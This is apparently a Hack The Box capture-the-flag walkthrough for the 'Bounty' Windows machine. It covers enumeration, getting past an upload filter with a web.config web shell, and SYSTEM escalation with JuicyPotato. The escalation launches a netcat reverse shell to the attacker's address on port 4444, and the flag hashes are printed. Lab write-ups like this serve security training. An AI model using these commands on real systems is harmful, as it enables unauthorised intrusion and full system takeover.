I start off with an nmap scan:
└─# nmap -sC -sV -A -v 10.10.10.93
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Bounty

I proceed to run directory bruteforcing:
└─# gobuster dir -u http://10.10.10.93 -w /usr/share/seclists/Discovery/Web-Content/common.txt -x aspx
/aspnet_client
/transfer.aspx
/uploadedfiles

We visit http://10.10.10.93/transfer.aspx and note we have an option to upload files. I search for aspx reverse shell, and upload.
And then set a netcat reverse listener and visit : http://10.10.10.93/uploadedfiles/shell.aspx
Aspx files are not allowed "Invalid File. Please try again", now we try a file with .config extension.

To be found here : https://github.com/tennc/webshell/blob/master/aspx/web.config

I upload the config and get a shell:
http://10.10.10.93/uploadedfiles/web.config
PS C:\Users\merlin\desktop> type user.txt
e29ad89891462e0b09741e3082f44a2f

====================================
Privelege escalation
====================================
Checking systeminfo this is a 64 bit machine and checking whoami /priv, the machine is vulnerable to sedimpersonateprivilege.
I need to run Juicypotato and also netcat listener. To upload these, I set samba share.
└─# python smbserver.py share /home/joe/Downloads/htb/oscp/windows/bounty -smb2support
On the windows machine:
rlin\desktop> net use Z: \\10.10.14.4\share
The command completed successfully.
PS C:\Users\merlin\desktop> cd Z:
PS Z:\> dir


    Directory: Z:\


Mode                LastWriteTime     Length Name                              
----                -------------     ------ ----                              
-a---          6/9/2021   1:00 AM        855 web.config                        
-a---          6/9/2021   1:10 AM     347648 JuicyPotato.exe                   
-a---          6/9/2021   1:07 AM       1841 systeminfo.txt                    
-a---          6/9/2021   1:02 AM       4402 Invoke-PowerShellTcp.ps1          
-a---          6/9/2021   1:11 AM      43696 nc64.exe                          
-a---          6/9/2021  12:52 AM      15969 shell.aspx

Then run the juicypotato:
.\JuicyPotato.exe -t * -l 9000 -p nc64.exe -a "-e cmd 10.10.14.4 4444"
And that is it!
C:\>whoami
whoami
nt authority\system

C:\>cd Users/Administrator/desktop
cd Users/Administrator/desktop

C:\Users\Administrator\Desktop>type root.txt
type root.txt
c837f7b699feef5475a0c079f9d4f5ea
